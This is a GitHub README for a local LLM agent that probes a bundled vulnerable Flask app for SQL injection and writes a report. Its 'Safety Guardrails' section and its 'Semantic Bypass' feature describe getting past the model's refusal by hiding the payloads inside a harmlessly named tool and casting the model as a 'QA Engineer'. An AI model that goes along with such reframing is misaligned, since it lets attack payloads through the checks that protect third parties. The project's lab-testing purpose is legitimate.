Skip to content

matheussricardoo/LocalLLMSecurityAuditor

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

An autonomous, privacy-first AI agent that detects SQL Injection vulnerabilities in local environments using Quantized LLMs.


Engineering Case Study

Details
Focus: AI Agents & Cybersecurity
Objective: Create an autonomous auditor running on consumer hardware (i5 + GTX 1050 Ti)
Model: Llama 3.2 3B (Quantized) via Ollama

Key Features

Feature Description
Autonomous Reasoning Independent decision-making on which tool to use (ReAct Loop)
Privacy-First Runs 100% offline with no data sent to the cloud
Semantic Bypass Circumvents security filters using QA abstraction techniques
Resource Optimized Optimized for 4GB VRAM (CPU/GPU Hybrid mode)
Auto-Reporting Generates technical reports in Markdown format with evidence
Active DAST Dynamic Application Security Testing focused on SQL Injection

Tech Stack

Architecture

graph LR
    A[Llama 3.2 Brain] -->|Decides Action| B(Python Controller)
    B -->|Executes Tool| C[Tool Set]
    C -->|Inspect HTML| D[Target App]
    C -->|Stress Test Payload| D
    D -->|Response 200/500| B
    B -->|Observation| A
    A -->|Final Decision| E[Report.md]
Loading

Engineering Journey & Challenges

Building an autonomous agent on consumer hardware (i5 + GTX 1050 Ti + 8GB RAM) presented unique challenges. Here is how we solved them:

1. Hardware Constraints (The "CUDA Error")

Problem: The GTX 1050 Ti (4GB VRAM) struggled with heavy model offloading, causing runtime crashes with modern drivers.

Solution: We implemented a hybrid fallback mechanism in Python (num_gpu=0) and switched to optimized "Tiny" models (Llama 3.2 3B) to ensure stability over raw speed.

2. The "Context Amnesia" Loop

Problem: Smaller models often lost track of the conversation state, entering infinite loops of INSPECT_URLINSPECT_URL.

Solution: We moved from a standard LangChain AgentExecutor to a custom Deterministic Control Loop. This allows the system to "kickstart" the agent if it hesitates and manually parse intent.

3. Safety Guardrails (The "I can't help you" Problem)

Problem: Llama 3.2 refused to generate SQL Injection payloads due to strict safety alignment.

Solution: We applied Semantic Abstraction. Instead of asking the LLM to "attack", we encapsulated the payloads inside a Python tool named stress_test_login_inputs. The LLM operates as a "QA Engineer" performing stability tests, bypassing refusal triggers.

Getting Started

Prerequisites

  • Python 3.10+
  • Ollama installed and running

1. Setup Environment

# Clone repository
git clone https://github.com/matheussricardoo/LocalLLMSecurityAuditor.git
cd LocalLLMSecurityAuditor

# Create Virtual Env
python -m venv venv
.\venv\Scripts\Activate.ps1

# Install Dependencies
pip install -r requirements.txt

2. Download the Model

ollama pull llama3.2:3b

3. Usage

You need two terminals running simultaneously:

Terminal 1 (Target Application):

python target_app/app.py

Terminal 2 (Security Agent):

python main.py

Check the generated RELATORIO_FINAL.md after execution.

Project Structure

LocalLLMSecurityAuditor/
├── main.py                 # The Agent Brain & Control Loop
├── requirements.txt        # Python dependencies
├── RELATORIO_FINAL.md      # Generated security report
├── tools/
│   ├── __init__.py         # Tools module initialization
│   └── web_tools.py        # Inspection and testing tools
└── target_app/
    └── app.py              # Vulnerable Flask application for testing

Legal Disclaimer

This tool is developed strictly for educational purposes and authorized security testing (CTF/Lab environments).

The author is not responsible for any misuse of this software. Use this tool only on systems you own or have explicit permission to test.

Author

About

An autonomous, privacy-first Dynamic Application Security Testing (DAST) agent powered by Local LLMs (Ollama). It orchestrates tools to detect, validate, and report vulnerabilities in local environments without data exposure.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages